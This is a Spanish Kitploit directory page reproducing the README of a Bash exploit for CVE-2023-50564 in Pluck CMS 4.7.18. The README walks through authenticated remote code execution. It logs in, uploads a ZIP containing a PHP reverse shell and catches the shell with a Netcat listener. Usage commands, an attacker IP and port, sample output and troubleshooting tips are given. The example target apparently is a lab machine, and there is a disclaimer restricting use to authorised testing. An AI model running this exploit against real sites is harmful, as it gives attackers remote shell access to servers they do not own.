Skip to content
KitploitKITPLOIT
HerramientasBlog
Log in
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

FeedsContactoPrivacidad© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Pluck-CMS-v4.7.18-Remote-Code-Execution-CVE-2023-50564 — Exploit Bash que automatiza la ejecución remota de código autenticada en Pluck CMS 4.7.18 mediante la carga de un ZIP malicioso, desencadenando una shell inversa PHP para CVE-2023-50564. | Kitploit
Herramientas/GitHubGitHub/0xdtc/pluck-cms-v4.7.18-remote-code-execution-cve-2023-50564
Generación de PayloadsExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónRed TeamingHerramienta de Acceso Remoto
GitHub0xdtc/pluck-cms-v4.7.18-remote-code-execution-cve-2023-50564

Pluck-CMS-v4.7.18-Remote-Code-Execution-CVE-2023-50564

Exploit Bash que automatiza la ejecución remota de código autenticada en Pluck CMS 4.7.18 mediante la carga de un ZIP malicioso, desencadenando una shell inversa PHP para CVE-2023-50564.

Ver Repositorio
14hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2023-50564 - Pluck CMS v4.7.18 Exploit de Ejecución Remota de Código (RCE)

Descripción

Este script explota una vulnerabilidad de Ejecución Remota de Código (RCE) en Pluck CMS v4.7.18. La vulnerabilidad permite a un usuario malintencionado subir un archivo PHP malicioso al servidor y ejecutarlo, obteniendo ejecución remota de comandos en la máquina objetivo.

El script automatiza todo el proceso mediante:

  1. Autenticándose en el panel de administración de Pluck CMS usando las credenciales proporcionadas.
  2. Subiendo un archivo ZIP que contiene un script PHP malicioso de reverse shell.
  3. Ejecutando el reverse shell PHP, dando al atacante acceso remoto a la máquina objetivo.

Nota: El script requiere un listener de Netcat en la máquina del atacante para recibir el reverse shell.


Requisitos previos

Antes de ejecutar el script, asegúrate de lo siguiente:

  • Netcat está instalado y se ha configurado un listener para recibir el reverse shell.
  • Tienes el host, contraseña, dirección IP y puerto correctos del objetivo para el reverse shell.
  • Tienes acceso al panel de administración de Pluck CMS en el objetivo.

Uso

./CVE-2023-50564 -h <host> -P <password> -i <IP> -p <port>

Argumentos:

  • -h <host>: El host objetivo (ej., greenhorn.htb).
  • -P <password>: La contraseña para el panel de administración de Pluck CMS (ej., abcd123).
  • -i <IP>: La dirección IP del atacante para recibir el reverse shell.
  • -p <port>: El puerto en el que está corriendo el listener de Netcat para capturar el reverse shell.

Ejemplo:

./CVE-2023-50564 -h greenhorn.htb -P ********* -i 10.10.16.7 -p 9001

Pasos:

  1. Configurar el listener de Netcat: En la máquina del atacante, inicia un listener de Netcat en el puerto especificado:

    nc -nvlp <port>
    

    Por ejemplo:

    nc -nvlp 9001
    
  2. Ejecutar el script: Proporciona los parámetros requeridos al script, incluyendo el host, contraseña, dirección IP y puerto.

    ./CVE-2023-50564 -h greenhorn.htb -P ********* -i 10.10.16.7 -p 9001
    
  3. Ejecución del script:

    • El script inicia sesión en el panel de administración de Pluck CMS.
    • Sube un archivo ZIP que contiene un script PHP de reverse shell (love.php).
    • Una vez que el archivo ZIP se ha subido, el reverse shell se ejecuta en el objetivo y se establece una conexión con tu listener de Netcat.
    • Se mostrará un mensaje limpio: "RCE is waiting for you, please go take a look.", y el script finalizará después de registrar el tiempo tomado.
  4. Acceder al objetivo: Una vez que se active el reverse shell, la conexión aparecerá en tu listener de Netcat, dándote acceso remoto a la máquina objetivo.


POC

image


Ejemplo de salida

./CVE-2023-50564 -h greenhorn.htb -P ********* -i 10.10.16.7 -p 9001
Netcat listener detected on port 9001.
Downloading reverse shell PHP exploit...
updating: love.php (deflated 60%)
Exploit zipped as loverce.zip and original PHP file removed.
Extracted Cookie: PHPSESSID=somecookievalue
Login successful!
ZIP file uploaded successfully.
RCE is waiting for you, please go take a look.
Script terminated. Total time taken: 70 seconds.

Requisitos

  • cURL: Para interactuar con Pluck CMS y subir archivos.
  • Netcat: Para escuchar el reverse shell.

Puedes instalar curl y netcat usando los siguientes comandos si no están instalados:

Debian/Ubuntu:

sudo apt update
sudo apt install curl netcat

Red Hat/CentOS/Fedora:

sudo yum install curl nc

Descargo de responsabilidad

Este script está destinado únicamente a fines educativos y de pruebas de penetración autorizadas. El uso no autorizado de este script es ilegal y poco ético. Siempre obtén la autorización adecuada antes de explotar cualquier vulnerabilidad en un sistema.


Resolución de problemas

  1. 504 Gateway Time-out: El script puede encontrar este error al intentar ejecutar el reverse shell, pero esto no afecta el éxito de la ejecución del shell. El error generalmente se debe a que el servidor objetivo tarda demasiado en responder a la solicitud HTTP, pero el shell debería seguir funcionando.

  2. Problemas con el Listener de Netcat: Si no recibes el reverse shell, asegúrate de que tu dirección IP y puerto estén configurados correctamente, y de que no haya restricciones de firewall que impidan que el objetivo se conecte de vuelta a tu máquina.

  3. El script falla al iniciar sesión: Si falla el inicio de sesión en el panel de administración del CMS, verifica la contraseña proporcionada y asegúrate de que el CMS sea accesible en la máquina objetivo.


Házmelo saber si deseas alguna personalización o aclaración adicional en el README.

Descargar herramienta